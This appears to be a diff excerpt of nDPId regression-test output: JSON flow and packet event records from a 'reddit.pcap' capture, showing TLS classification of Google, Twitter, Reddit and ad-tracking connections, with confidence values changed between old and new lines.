+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291691029,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQbO1037mLrsxooBJXgErvAAACBAV4AQMDAwQCCArC10wIuJU7dg=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9476,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":74,"pkt_l4_len":20,"thread_ts_msec":1605291691029,"pkt":"qtsDr8lk5EKm5WPyht1gBfK\/ABQGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGgAAAAAUAQAANo6AAA="} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291696948,"flow_last_seen":1605291696948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291696948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1605291696948,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696948,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBQAAAAAoAL9IL45AAACBAWgBAIIClIhuaMAAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11227,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696965,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADTTrOwqAcsBIEmLB5kd7IUo3\/YpAbu3nh9OKxV4xygVoBJXgPOCAAACBAV4AQMDAwQCCArC12M3UiG5ow=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11228,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291696965,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBUfTisWgBAB+3eDAAABAQgKUiG5tMLXYzc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00617{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 